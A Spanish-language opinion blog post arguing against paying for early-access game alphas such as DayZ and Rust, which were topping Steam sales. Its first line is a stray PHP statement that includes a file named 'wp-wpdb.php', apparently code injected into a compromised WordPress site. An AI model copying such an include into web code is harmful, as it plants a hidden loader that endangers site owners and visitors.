if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Acceso anticipado: Paga por jugar a una beta – La Fortaleza de LeChuck

Acceso anticipado: Paga por jugar a una beta

Cuando la moda del Kickstarter se ha quedado un poco en segundo plano, tras ver que no todo era jauja y según que proyectos en desarrollo de videojuegos no tienen cabida si no llaman a la nostalgia, otra moda llega al mundo del videojuego. Acostumbrados estamos desde hace unos meses a jugar betas, abiertas o por invitación, de muchos juegos, y después, tras la salida del juego, decidir si comprarlo. Más de uno y de dos hemos probado betas de juegos y hemos visto que el juego no cumplía con tus gustos, lejos de los obvios errores que suelen traer, puesto que básicamente se hacen para que los jugadores reporten la mayor cantidad de problemas a la hora de jugar a sus desarrolladores. Al menos eran gratuitas, por que todo eso va a quedarse atrás, y ya lo está haciendo con los «Accesos anticipados de pago».

Ahora mismo, se podría decir, que el mundo del videojuego está realmente saturado, y tiene toda la pinta de que la burbuja estallará de un momento a otro. Cada año salen más cantidad de juegos, sobretodo gracias a los medios digitales, que permiten a los desarrolladores mostrar su propuesta directamente a sus clientes finales sin pasar por ningún editor que interfiera en su concepto. Y nosotros, pues no paramos, literalmente, de comprar videojuegos. Recuerdo aquellos tiempos donde el equilibrio del precio de un juego lo hacía más valioso y con tal coste, se hacía más difícil tener juegos acumulados sin jugar. No estoy diciendo que quiero que suban los precios, tampoco quiero que la alternativa digital deje de existir, sin ella me habría perdido grandes joyas, pero… ¿Acceso anticipado?
En la imagen que ilustra mi artículo tenéis lo que me ha conducido a realizarla. Si os fijáis, cuatro del Top 5 de ventas en Steam, son juegos de acceso anticipado, es decir, que todavía no existen en su plenitud, sino que son meras betas de juegos con mucho trabajo por delante. No os voy a engañar, si tuviera la posibilidad de hacer lo mismo con un nuevo Zelda, seguramente lo haría, pues creo que es apostar sobre seguro, igual que suele pasar con las Kickstarter y las promesas de «devolver la saga X a sus inicios». Es difícil resistirse si hablamos de tu saga favorita.

 

Volvamos a la lista, DayZ, juego que ha vendido casi un millón de unidades en 3 semanas, aún con avisos del propio desarrollador EN MAYÚSCULAS diciendo «No compréis el juego si no váis a reportar errores, no está ni medio hecho, con un poco de suerte estará en beta a finales de este año». Sí, a finales de 2014 estará en beta, porque ahora ¡Solo está en alpha! Una versión muy prematura de lo que será el juego DayZ, el cúal tras el éxito cosechado como mod de Arma II, han decidido realizar. Puedo seguir jugando al mod de DayZ para Arma II, pero no, voy y pago más de 20€ por una alpha a la que faltan muchísimas características y tiene, obviamente, muchísimos errores.
Sí, cada uno hace lo que quiere con su dinero. Eso está claro. Solo estamos pensando. Estamos reflexionando sobre ello. Este es el valor de las cosas, cuando alguien se ha ganado por trabajos anteriores el amor incondicional de muchos jugadores ¿Porque no apoyarle de esta forma? Al fin y al cabo, es una más de las maravillas de Internet, siempre hay algún sitio donde invertir tu dinero, en cada rincón, y con DayZ podrías tener asegurada tu inversión, si no fuera por que… Nadie dice que el desarrollador no puede coger la pasta y dejarte jugando con su versión «Alpha» ¿Quién te dice que un día no se le giren los sesos, le añada cuatro cosas y te diga que es la versión final? Piénsalo.

 

 

Esto no va de DayZ, porque a mi realmente, el mod en sí, me gustó bastante y me pareció curioso. Y no le podía exigir tampoco excelencia jugable, era un mod gratuito. Esto va sobre el «Acceso anticipado» de pago. Rust, nuevo juego del creador de Garry’s Mod, al ver el éxito de DayZ, se suma con una idea parecida, en primera persona, y con tintes más «Minecrafteros». Más de lo mismo, un montón de ventas, 18,99€ para comenzar a jugar. ¡Vamos para allá!

Vivimos una época en la que hay muchísimos juegos, tantos, que a unos les da por comprar juegos completos, cuando tienen ya todos los DLC en su versión «GOTY», y tenemos a los que compran desde la primera alpha. Tampoco es para tanto, supongo que al final lo que importa es jugar. El videojuego ya lleva tiempo cuesta abajo y sin frenos, y las compañías y los desarrolladores, hacen lo que quieren con nosotros. Por el momento intentaremos seguir disfrutando de ellos, porque por suerte, todavía tenemos alternativas, enteras y a buenos precios, sin tener que caer en estos pozos, que pueden ser una mina de oro jugable, o pueden estar llenos de lodo ponzoñoso. Y ojo, que todos queremos que un juego que tiene buena pinta llegue a buen puerto, pero ¿Cuantas veces te ha pasado que algo con buena pinta termina no resultando tan bueno o incluso malo? 

Lo twitteaba el otro día ¡La culpa es de Youtube! Los sucédaneos de Minecraft y DayZ son los juegos favoritos para subir un Gameplay a la red social de videos ¡Y se lanzan como locos aunque estén en Alpha! Otro mundillo saturado (Pero mucho, creo que hay más gente subiendo gameplays que gente que los quiera ver) que petará de un momento al otro. Es lo de siempre, estas cosas ya las hemos vivido en otros ámbitos. ¡Recapacitemos!

Publicada el
Categorizado como Opinión

Por Museboy

Como la mayoría de vosotros, crecí jugando a videojuegos y ahora intento transmitir toda la pasión por este mundo en La Fortaleza de LeChuck. También busco ofertas de videojuegos. Seguidme en Twitter y sabréis de qué hablo.

1 comentario

Dejar un comentario